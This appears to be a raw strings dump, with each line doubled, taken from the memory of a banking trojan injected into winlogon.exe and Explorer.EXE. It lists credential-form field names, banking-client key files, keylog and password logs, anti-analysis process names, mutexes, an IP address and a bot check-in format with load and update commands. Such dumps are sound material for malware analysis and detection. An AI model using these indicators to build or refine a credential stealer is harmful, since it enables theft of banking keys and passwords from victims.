pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

PTF://anonymous:

AUTHINFO PASS

AUTHINFO PASS

j_password=

j_password=

pass.log

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edClientLogin=

edUserLogin=

edUserLogin=

edPassword=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

&LOGIN_AUTHORIZATION_CODE=

login=

login=

password=

password=

pass_

pass_

ssleay32.dll

ssleay32.dll

advapi32.dll

advapi32.dll

path.txt

path.txt

keys.zip

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

keys

private.txt

private.txt

public.txt

public.txt

\*.key

\*.key

\self.cer

\self.cer

self.cer

self.cer

self.pub

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.exe

ctunnel.zip

ctunnel.zip

path_ctunnel.txt

path_ctunnel.txt

header.key

header.key

keys99

keys99

\header.key

\header.key

masks2.key

masks2.key

\masks2.key

\masks2.key

masks.key

masks.key

\masks.key

\masks.key

\name.key

\name.key

primary2.key

primary2.key

\primary2.key

\primary2.key

primary.key

primary.key

\primary.key

\primary.key

keys99.zip

keys99.zip

path99.txt

path99.txt

bsi.dll

bsi.dll

&domain=letitbit.net&

&domain=letitbit.net&

cc.txt

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

prv_key.pfx

keys\

keys\

sign.cer

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

sks2xyz.dll

vb_pfx_import

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

secret.key

pubkeys.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

path1.txt

inter.zip

inter.zip

interpro.ini

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

FilialRCon.dll

ISClient.cfg

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

Agava_Client.exe

KeysDiskPath

KeysDiskPath

Agava_Client.ini

Agava_Client.ini

Agava_keys

Agava_keys

keys_path.txt

keys_path.txt

mespro.dll

mespro.dll

AddPSEPrivateKeyEx

AddPSEPrivateKeyEx

core.exe

core.exe

data\id.dbf

data\id.dbf

\data\id.dbf

\data\id.dbf

keys%i.zip

keys%i.zip

path%i.txt

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

winmm.dll

1.2.5

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

%s\%s

RFB d.d

RFB d.d

%s (%s)

%s (%s)

d/d/d d:d

d/d/d d:d

password check failed!

password check failed!

WinSCard.dll

WinSCard.dll

SensApi.dll

SensApi.dll

GetTcpTable

GetTcpTable

IPHLPAPI.DLL

IPHLPAPI.DLL

dbghelp.dll

dbghelp.dll

PSAPI.DLL

PSAPI.DLL

NETAPI32.dll

NETAPI32.dll

DNSAPI.dll

DNSAPI.dll

HttpQueryInfoA

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

SHFileOperationA

SHFileOperationA

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetSystemWindowsDirectoryA

WinExec

WinExec

SetThreadExecutionState

SetThreadExecutionState

GetWindowsDirectoryW

GetWindowsDirectoryW

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

ActivateKeyboardLayout

ActivateKeyboardLayout

SetKeyboardState

SetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

EnumChildWindows

EnumChildWindows

GetKeyboardLayout

GetKeyboardLayout

MapVirtualKeyW

MapVirtualKeyW

VkKeyScanExW

VkKeyScanExW

USER32.dll

USER32.dll

SetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

RegFlushKey

RegFlushKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

RegDeleteKeyA

RegDeleteKeyA

RegEnumKeyExA

RegEnumKeyExA

RegQueryInfoKeyW

RegQueryInfoKeyW

RegOpenKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

gdiplus.dll

gdiplus.dll

MSVCRT.dll

MSVCRT.dll

ShellExecuteW

ShellExecuteW

GetProcessHeap

GetProcessHeap

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

;3 #>6.&

;3 #>6.&

'2, / 0&7!4-)1#

'2, / 0&7!4-)1#

5`6C6Q6}6

5`6C6Q6}6

6f6C6

6f6C6

8 8$8(8,8

8 8$8(8,8

Windows Explorer

Windows Explorer

mavast.com

mavast.com

ya.ru

ya.ru

serverkey.dat

serverkey.dat

\windows\

\windows\

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

iexplore.exe

MSCTF.Shared.MUTEX.x

MSCTF.Shared.MUTEX.x

Desk_%ux

Desk_%ux

MSCTF.Shared.MAPPING.x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.EVENT.x

.Prev

.Prev

.current

.current

HighMemoryEvent_x

HighMemoryEvent_x

winlogon.exe_716_rwx_01C40000_000C6000:

.text

.text

`.rdata

`.rdata

@.data

@.data

@.reloc

@.reloc

http

http

SSSh

SSSh

PASSu:8V

PASSu:8V

PASSu-8V

PASSu-8V

PSSSSSSSh

PSSSSSSSh

t%F;5

t%F;5

12345678

12345678

password1

password1

monkey

monkey

monkey1

monkey1

password

password

Pname.key

Pname.key

\secrets.key

\secrets.key

kernel32.dll

kernel32.dll

\explorer.exe

\explorer.exe

user32.dll

user32.dll

multi_pot.exe

multi_pot.exe

HookExplorer.exe

HookExplorer.exe

proc_analyzer.exe

proc_analyzer.exe

sckTool.exe

sckTool.exe

sniff_hit.exe

sniff_hit.exe

sysAnalyzer.exe

sysAnalyzer.exe

idag.exe

idag.exe

ollydbg.exe

ollydbg.exe

dumpcap.exe

dumpcap.exe

wireshark.exe

wireshark.exe

avp.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

%s!%s!X

sysinfo.log

sysinfo.log

scr.jpg

scr.jpg

minidump.bin

minidump.bin

%d.%d.%d.%d

%d.%d.%d.%d

Ý %dh %dm

Ý %dh %dm

%s:%d

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

Software\Microsoft\Internet Explorer\TypedURLs

url%i

url%i

4.5.11

4.5.11

%dx%d@%d

%dx%d@%d

%c%d:d

%c%d:d

{Windows directory:

{Windows directory:

links.log

links.log

\History.IE5\index.dat

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

\Opera\Opera\typed_history.xml

avast.com

avast.com

93.191.13.100

93.191.13.100

drweb

drweb

eset.com

eset.com

z-oleg.com

z-oleg.com

kltest.org.ru

kltest.org.ru

.comodo.com

.comodo.com

google.com

google.com

Dnsapi.dll

Dnsapi.dll

ws2_32.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

/search.php

Winmm.dll

Winmm.dll

Kernel32.dll

Kernel32.dll

Gdi32.dll

Gdi32.dll

ntdll.dll

ntdll.dll

hXXp://

hXXp://

hXXps://

hXXps://

HTTP/1.

HTTP/1.

nspr4.dll

nspr4.dll

PR_OpenTCPSocket

PR_OpenTCPSocket

[[[URL: %s

[[[URL: %s

Process: %s

Process: %s

User-agent: %s]]]

User-agent: %s]]]

{{{%s

{{{%s

Crypt32.dll

Crypt32.dll

CertVerifyCertificateChainPolicy

CertVerifyCertificateChainPolicy

Wininet.dll

Wininet.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestW

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

set_url

set_url

microsoft.public.win32.programmer.kernel

microsoft.public.win32.programmer.kernel

\iexplore.exe

\iexplore.exe

keygrab

keygrab

u.jpg

u.jpg

IprivLibEx.dll

IprivLibEx.dll

\\.\PhysicalDrive%u

\\.\PhysicalDrive%u

/topic.php

/topic.php

keylog.txt

keylog.txt

sniff.log

sniff.log

passwords.txt

passwords.txt

%s%u.zip

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.bing.com

VVV.microsoft.com

VVV.microsoft.com

frd.exe

frd.exe

command=config&update_url=

command=config&update_url=

&port=

&port=

command=load&url=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\chrome.exe

\svchost.exe

\svchost.exe

\opera.exe

\opera.exe

\cbmain.ex

\cbmain.ex

\iscc.exe

\iscc.exe

\clmain.exe

\clmain.exe

%s.dbf

%s.dbf

%s.DBF

%s.DBF

pop2://%s:%s@%s:%i

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

PTF://anonymous:

AUTHINFO PASS

AUTHINFO PASS

j_password=

j_password=

pass.log

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edClientLogin=

edUserLogin=

edUserLogin=

edPassword=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

&LOGIN_AUTHORIZATION_CODE=

login=

login=

password=

password=

pass_

pass_

ssleay32.dll

ssleay32.dll

advapi32.dll

advapi32.dll

path.txt

path.txt

keys.zip

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

keys

private.txt

private.txt

public.txt

public.txt

\*.key

\*.key

\self.cer

\self.cer

self.cer

self.cer

self.pub

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.exe

ctunnel.zip

ctunnel.zip

path_ctunnel.txt

path_ctunnel.txt

header.key

header.key

keys99

keys99

\header.key

\header.key

masks2.key

masks2.key

\masks2.key

\masks2.key

masks.key

masks.key

\masks.key

\masks.key

\name.key

\name.key

primary2.key

primary2.key

\primary2.key

\primary2.key

primary.key

primary.key

\primary.key

\primary.key

keys99.zip

keys99.zip

path99.txt

path99.txt

bsi.dll

bsi.dll

&domain=letitbit.net&

&domain=letitbit.net&

cc.txt

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

prv_key.pfx

keys\

keys\

sign.cer

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

sks2xyz.dll

vb_pfx_import

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

secret.key

pubkeys.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

path1.txt

inter.zip

inter.zip

interpro.ini

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

FilialRCon.dll

ISClient.cfg

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

Agava_Client.exe

KeysDiskPath

KeysDiskPath

Agava_Client.ini

Agava_Client.ini

Agava_keys

Agava_keys

keys_path.txt

keys_path.txt

mespro.dll

mespro.dll

AddPSEPrivateKeyEx

AddPSEPrivateKeyEx

core.exe

core.exe

data\id.dbf

data\id.dbf

\data\id.dbf

\data\id.dbf

keys%i.zip

keys%i.zip

path%i.txt

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

winmm.dll

1.2.5

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

%s\%s

RFB d.d

RFB d.d

%s (%s)

%s (%s)

d/d/d d:d

d/d/d d:d

password check failed!

password check failed!

WinSCard.dll

WinSCard.dll

SensApi.dll

SensApi.dll

GetTcpTable

GetTcpTable

IPHLPAPI.DLL

IPHLPAPI.DLL

dbghelp.dll

dbghelp.dll

PSAPI.DLL

PSAPI.DLL

NETAPI32.dll

NETAPI32.dll

DNSAPI.dll

DNSAPI.dll

HttpQueryInfoA

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

SHFileOperationA

SHFileOperationA

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetSystemWindowsDirectoryA

WinExec

WinExec

SetThreadExecutionState

SetThreadExecutionState

GetWindowsDirectoryW

GetWindowsDirectoryW

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

ActivateKeyboardLayout

ActivateKeyboardLayout

SetKeyboardState

SetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

EnumChildWindows

EnumChildWindows

GetKeyboardLayout

GetKeyboardLayout

MapVirtualKeyW

MapVirtualKeyW

VkKeyScanExW

VkKeyScanExW

USER32.dll

USER32.dll

SetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

RegFlushKey

RegFlushKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

RegDeleteKeyA

RegDeleteKeyA

RegEnumKeyExA

RegEnumKeyExA

RegQueryInfoKeyW

RegQueryInfoKeyW

RegOpenKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

gdiplus.dll

gdiplus.dll

MSVCRT.dll

MSVCRT.dll

ShellExecuteW

ShellExecuteW

GetProcessHeap

GetProcessHeap

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

;3 #>6.&

;3 #>6.&

'2, / 0&7!4-)1#

'2, / 0&7!4-)1#

SYSTEM!XP9!F9BE9A8A

SYSTEM!XP9!F9BE9A8A

%WinDir%\apppatch\hwcmqr.exe

%WinDir%\apppatch\hwcmqr.exe

%Documents and Settings%\%current user%\Application Data\

%Documents and Settings%\%current user%\Application Data\

5`6C6Q6}6

5`6C6Q6}6

6f6C6

6f6C6

8 8$8(8,8

8 8$8(8,8

`.data

`.data

.reloc

.reloc

Windows Explorer

Windows Explorer

mavast.com

mavast.com

ya.ru

ya.ru

serverkey.dat

serverkey.dat

\windows\

\windows\

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

iexplore.exe

MSCTF.Shared.MUTEX.x

MSCTF.Shared.MUTEX.x

Desk_%ux

Desk_%ux

MSCTF.Shared.MAPPING.x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.EVENT.x

.Prev

.Prev

.current

.current

HighMemoryEvent_x

HighMemoryEvent_x

Explorer.EXE_840_rwx_01F00000_00061000:

.text

.text

`.data

`.data

.reloc

.reloc

`.rdata

`.rdata

@.data

@.data

@.reloc

@.reloc

http

http

SSSh

SSSh

PASSu:8V

PASSu:8V

PASSu-8V

PASSu-8V

PSSSSSSSh

PSSSSSSSh

t%F;5

t%F;5

12345678

12345678

password1

password1

monkey

monkey

monkey1

monkey1

password

password

Pname.key

Pname.key

\secrets.key

\secrets.key

kernel32.dll

kernel32.dll

\explorer.exe

\explorer.exe

user32.dll

user32.dll

multi_pot.exe

multi_pot.exe

HookExplorer.exe

HookExplorer.exe

proc_analyzer.exe

proc_analyzer.exe

sckTool.exe

sckTool.exe

sniff_hit.exe

sniff_hit.exe

sysAnalyzer.exe

sysAnalyzer.exe

idag.exe

idag.exe

ollydbg.exe

ollydbg.exe

dumpcap.exe

dumpcap.exe

wireshark.exe

wireshark.exe

avp.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

%s!%s!X

sysinfo.log

sysinfo.log

scr.jpg

scr.jpg

minidump.bin

minidump.bin

%d.%d.%d.%d

%d.%d.%d.%d

Ý %dh %dm

Ý %dh %dm

%s:%d

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

Software\Microsoft\Internet Explorer\TypedURLs

url%i

url%i

4.5.11

4.5.11

%dx%d@%d

%dx%d@%d

%c%d:d

%c%d:d

{Windows directory:

{Windows directory:

links.log

links.log

\History.IE5\index.dat

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

\Opera\Opera\typed_history.xml

avast.com

avast.com

93.191.13.100

93.191.13.100

drweb

drweb

eset.com

eset.com

z-oleg.com

z-oleg.com

kltest.org.ru

kltest.org.ru

.comodo.com

.comodo.com

google.com

google.com

Dnsapi.dll

Dnsapi.dll

ws2_32.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

/search.php

Winmm.dll

Winmm.dll

Kernel32.dll

Kernel32.dll

Gdi32.dll

Gdi32.dll

ntdll.dll

ntdll.dll

hXXp://

hXXp://

hXXps://

hXXps://

HTTP/1.

HTTP/1.

nspr4.dll

nspr4.dll

PR_OpenTCPSocket

PR_OpenTCPSocket

[[[URL: %s

[[[URL: %s

Process: %s

Process: %s

User-agent: %s]]]

User-agent: %s]]]

{{{%s

{{{%s

Crypt32.dll

Crypt32.dll

CertVerifyCertificateChainPolicy

CertVerifyCertificateChainPolicy

Wininet.dll

Wininet.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestW

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

set_url

set_url

microsoft.public.win32.programmer.kernel

microsoft.public.win32.programmer.kernel

\iexplore.exe

\iexplore.exe

keygrab

keygrab

u.jpg

u.jpg

IprivLibEx.dll

IprivLibEx.dll

\\.\PhysicalDrive%u

\\.\PhysicalDrive%u

/topic.php

/topic.php

keylog.txt

keylog.txt

sniff.log

sniff.log

passwords.txt

passwords.txt

%s%u.zip

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.bing.com

VVV.microsoft.com

VVV.microsoft.com

frd.exe

frd.exe

command=config&update_url=

command=config&update_url=

&port=

&port=

command=load&url=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\chrome.exe

\svchost.exe

\svchost.exe

\opera.exe

\opera.exe

\cbmain.ex

\cbmain.ex

\iscc.exe

\iscc.exe

\clmain.exe

\clmain.exe

%s.dbf

%s.dbf

%s.DBF

%s.DBF

pop2://%s:%s@%s:%i

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

PTF://anonymous:

AUTHINFO PASS

AUTHINFO PASS

j_password=

j_password=

pass.log

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edClientLogin=

edUserLogin=

edUserLogin=

edPassword=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

&LOGIN_AUTHORIZATION_CODE=

login=

login=

password=

password=

pass_

pass_

ssleay32.dll

ssleay32.dll

advapi32.dll

advapi32.dll

path.txt

path.txt

keys.zip

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

